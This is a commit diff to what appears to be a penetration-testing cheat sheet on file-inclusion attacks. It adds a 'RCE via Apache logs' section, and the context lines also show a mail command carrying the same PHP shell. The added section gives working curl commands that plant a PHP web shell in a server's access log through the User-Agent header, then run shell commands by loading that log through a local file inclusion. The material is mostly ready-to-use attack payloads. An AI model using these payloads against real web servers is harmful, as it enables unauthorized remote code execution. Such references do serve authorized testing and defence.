add RCE via Apache logs in log poisoning

2024-05-12 10:36:03 +02:00 · 2021-05-10 11:48:14 +02:00 · 2021-05-10 11:48:14 +02:00 · 61eed94f18
parent a723a34449
commit 61eed94f18
1 changed files with 16 additions and 0 deletions
--- a/Inclusion/README.md
+++ b/Inclusion/README.md
@ -345,6 +345,22 @@ In some cases you can also send the email with the `mail` command line.
 mail -s "<?php system($_GET['cmd']);?>" www-data@10.10.10.10. < /dev/null
 ```

+### RCE via Apache logs
+
+Poison the User-Agent in access logs:
+
+```
+$ curl http://example.org/ -A "<?php system(\$_GET['cmd']);?>"
+```
+
+Note: The logs will escape double quotes so use single quotes for strings in the PHP payload.
+
+Then request the logs via the LFI and execute your command.
+
+```
+$ curl http://example.org/test.php?page=/var/log/apache2/access.log&cmd=id
+```
+
 ## LFI to RCE via PHP sessions

 Check if the website use PHP Session (PHPSESSID)